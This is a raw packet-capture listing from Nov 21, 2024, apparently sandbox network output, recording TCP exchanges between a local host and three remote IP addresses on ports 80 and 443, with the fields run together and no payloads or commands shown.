                                                                                                                                                                      Nov 21, 2024 06:23:41.487667084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.487678051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.487729073 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.487801075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.487812996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.488003969 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.488579988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.488631964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.488641977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.488655090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.488667965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.488678932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.488694906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.488739967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.489511967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.489536047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.489548922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.489590883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.489602089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.489607096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.489633083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.490473032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.490520000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.490533113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.490534067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.490566969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.490576029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.490577936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.490621090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.491389990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.491414070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.491424084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.491475105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.491547108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.491566896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.491616011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.492327929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.492378950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.492392063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.492404938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.492429972 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.492486000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.492497921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.492537022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.493288994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.493335009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.493346930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.493387938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.493447065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.493458986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.493494987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.494251013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.494302034 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.494302988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.494314909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.494362116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.494513035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.494525909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.494574070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.495186090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.495261908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.495273113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.495284081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.495295048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.495326042 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.495362997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.496119976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.496160030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.496171951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.496264935 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.496284008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.496298075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.496346951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.497060061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.497086048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.497097015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.497123003 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.497206926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.497220039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.497260094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.498033047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.498078108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.498087883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.498142004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.498150110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.498162031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.498199940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.499006987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.499020100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.499031067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.499078989 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.499100924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.499114037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.499155045 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.499911070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.499974012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.499982119 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.503403902 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.511157036 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.511182070 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.511643887 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.511648893 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.540466070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.613341093 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.624661922 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.624680042 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.625102997 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.625108004 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.865540028 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.865622997 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.865708113 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.866091013 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.866121054 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.866187096 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.866195917 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.871853113 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.871901035 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.872631073 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.873672962 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.873689890 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.946584940 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.946645021 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.946856976 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.955926895 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.955940962 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.955971956 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.955981970 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.959706068 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.959748030 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.960472107 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.974724054 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.974749088 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.019669056 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.025393009 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.025429964 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.025901079 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.025908947 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.056391001 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.056484938 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.057173014 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.059530973 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.059571028 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.059609890 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.059626102 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.062383890 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.062427998 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.062508106 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.062865973 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.062880993 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.256536007 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.258522034 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.258570910 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.259155035 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.259174109 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.464622021 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.464695930 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.465049028 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.492213011 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.492245913 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.492260933 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.492268085 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.518719912 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.518850088 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:42.527242899 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:42.527283907 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.527739048 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.571624994 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:42.694138050 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.694202900 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.694271088 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.763056993 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:42.763276100 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:42.763288975 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.763537884 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:42.764530897 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.764559031 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.764571905 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.764579058 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.807840109 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.807898045 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.808042049 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.811335087 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.815026045 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.815071106 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.815228939 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.815248966 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:42.815256119 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.818980932 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:42.818994999 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.291430950 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.291537046 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.291604996 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:43.291789055 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:43.291809082 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.586297035 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.586757898 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:43.586775064 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.587281942 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:43.587285995 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.716980934 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.717434883 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:43.717462063 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.717865944 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:43.717871904 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.753660917 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.754188061 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:43.754201889 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:43.754555941 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:43.754576921 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.023339033 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.023406982 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.023581028 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.023612976 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.023631096 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.023641109 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.023646116 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.026160002 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.026206017 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.026454926 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.026627064 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.026635885 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.170456886 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.170536995 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.170610905 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.170783043 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.170794964 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.170804977 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.170809984 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.174228907 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.174267054 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.174345970 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.174670935 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.174688101 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.202384949 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.202459097 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.202573061 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.202625036 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.202625036 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.202641964 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.202650070 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.205024004 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.205058098 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.205132008 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.205276012 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.205291033 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.596704006 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.597228050 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.597245932 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.597817898 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.597825050 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.665987968 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.666492939 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.666516066 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:44.666929960 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:44.666934967 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.042177916 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.042253971 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.042365074 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.042769909 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.042769909 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.042790890 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.042804003 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.045963049 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.046008110 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.046401978 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.046612978 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.046627998 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.118633986 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.118696928 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.119035959 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.119175911 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.119196892 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.119206905 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.119211912 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.121582985 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.121673107 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.121762991 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.121937037 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.121972084 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.807501078 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.807976961 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.808002949 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.808444023 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.808449030 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.890834093 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.891220093 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.891236067 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.891665936 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.891671896 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.985821962 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.986330986 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.986367941 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:45.986987114 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:45.986993074 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.252401114 CET4434978113.107.246.45192.168.2.6
